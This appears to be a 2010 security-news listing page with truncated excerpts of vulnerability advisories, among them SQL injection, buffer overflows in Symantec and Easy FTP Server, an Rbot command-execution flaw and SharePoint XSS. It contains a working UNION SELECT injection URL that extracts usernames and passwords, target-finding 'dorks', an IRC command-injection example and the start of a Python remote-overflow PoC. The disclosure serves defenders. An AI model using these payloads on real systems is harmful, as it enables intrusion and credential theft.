# Title: [SQL injection vulnerability in LiveChatNow]
# Date: [20.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.livechatnow.com/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]


============ { Ariko-Security - Advisory #4/2/2010 } =============

      SQL injection vulnerability in LiveChatNow



Vendor's Description of Software:
# http://www.livechatnow.com/
#demo


http://zebra.livechatnow.com/js/enter.php?cid=7546&skin=&survey=&survey_ec=&survey_lm=&group=On-Duty+Techs

Dork:
#Powered by www.LiveChatNow.co ... Read more »
Views: 1073 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

iDefense Security Advisory 02.23.10
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 23, 2010

I. BACKGROUND

The getPlus Downloader is an application download and installation
manager, distributed in the form of an ActiveX control. This control is
used by Adobe Systems Inc. to install Adobe Reader through the Adobe
website when Internet Explorer is used. Part of the functionality of
the getPlus Downloader is to download and execute applications from
preconfigured sites; in the case of Adobe, from adobe.com and its
subdomains. For more information, see the vendor's site found at the
following link.

http://www.nosltd.com/index.php?option=com_content&task= ... Read more »
Views: 6132 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

- Product

Rbot (aka Rubybot) is a very powerful and feature-rich IRC Bot written
in ruby: "Think of him as a ruby bot framework with a highly modular
design based around plugins." [1]

[1] http://ruby-rbot.org/

- Vulnerability

The reaction plugin allows anyone to create reactions that are
triggered by certain words or regular expressions. There are normal message
replies and two special reactions that can be triggered: ruby code and
bot command execution. The ruby action is correctly only allowed for
bot owners, but the command execution is not.

Here is an example for that:
<attacker> !react to /attacker:.*/ with cmd:whoami
 now the attacker is provoking a manual highlight from the bot owner:
<attacker> botowner: ping?
<botowner> attacker: pong, what's up?
<rbot> ... Read more »
Views: 798 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (1)

VUPEN Security Research - Symantec Products "SYMLTCOM.dll" Buffer Overflow Vulnerability

http://www.vupen.com/english/research.php


I. DESCRIPTION
---------------------
VUPEN Vulnerability Research Team discovered a vulnerability in various
Symantec security products.

The vulnerability is caused by a buffer overflow error in the SYMLTCOM.dll
module when processing user-supplied data, which could be exploited by
remote attackers to execute arbitrary code by tricking a user into visiting
a specially crafted web page on a domain masqueraded as an authorized site.


II. AFFECTED PRODUCTS
--------------------------------

Symantec N360 version 1.0
Symantec N360 version 2.0
Symantec Norton Internet Security 2006 through 2008
Symantec Norton AntiVirus 2006 through 2008
Symantec Norton Syste ... Read more »
Views: 679 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Official Portal 2007
#################################################################
# Vulnerability Info:
# Type: SQL Injection/XSS
# Risk: Medium
# Dork: "Official Portal 2007"
#################################################################
Vulnerability:
=======================
SQL Injection
=======================
http://site.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--

=======================
Cross Site Scrip ... Read more »
Views: 1107 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-039

Application:                    Symantec Antivirus Client Proxy
Versions Affected:              Version 10
Vendor URL:                     http://symantec.com
Bugs:                           Buffer Overflow
Exploits:                       POC
Reported:                       04.05.2009
Vendor response:                07.05.2009
Date of Public Advisory:        17.02.2010
CVE-number:               ... Read more »
Views: 5701 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

* Other vulnerabilities covered in bid:38262 *

=== Infos ===

Credit: loneferret
Found: 18/02/10
Versions affected <= 1.7.0.2

=== Description ===

Lack of input length checks for the CWD command results in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker.

=== Workaround ===

Upgrade to the latest version - 1.7.0.12

=== PoC ===

#!/usr/bin/python
import socket, sys

print """
*************************************************
*       Easy FTP Server 1.7.0.2 Remote BoF      *
*           Discovered by: Jon Butler           *
*       jonbutler88[at]googlemail[dot]com       *
*************************************************
"""

if len(sys.argv) != 3:
    ... Read more »
Views: 5635 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)


  (    , )     (,
 .   `.' ) ('.    ',
  ). , ('.   ( ) (
 (_,) .`), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
       \/         \/.-.    \/         \/:wq
                   (x.0)
                 '=.|w|.='
                 _='`"``=.

... Read more »
Views: 918 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

Hacktics Research Group Security Advisory
http://www.hacktics.com/#view=Resources%7CAdvisory

By Irene Abezgauz, Hacktics.
22-Feb-2010

===========
I. Overview
===========
During a penetration test performed by Hacktics' experts, a persistent
cross-site scripting vulnerability was identified in the SharePoint document
handling module. This vulnerability allows attackers to gain control over
valid user accounts, perform operations on their behalf, redirect them to
malicious sites, steal their credentials, and more.

A friendly formatted version of this advisory, including a video
demonstrating step-by-step execution of the exploit, is available at:
  http://www.hacktics.com/content/advisories/AdvMS20100222.html

========= ... Read more »
Views: 1015 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)